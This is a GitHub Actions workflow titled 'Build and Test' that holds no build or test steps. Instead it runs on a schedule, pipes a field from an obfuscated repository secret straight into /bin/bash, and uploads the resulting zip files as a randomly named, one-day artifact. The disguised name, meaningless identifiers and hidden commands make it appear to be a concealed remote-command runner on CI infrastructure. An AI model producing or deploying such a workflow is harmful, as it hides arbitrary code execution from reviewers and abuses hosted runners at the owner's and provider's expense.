name: Build and Test
on:
  workflow_dispatch:

  schedule:
    - cron: '6 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          vp5: ${{ secrets.vp5 }}
        run: |
          printf '%s' "$vp5" | jq -r .dju50 | /bin/bash
          echo $a328 | jq -r .q77099 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: ZZw1vnoT
          path: "*.zip"
          retention-days: 1
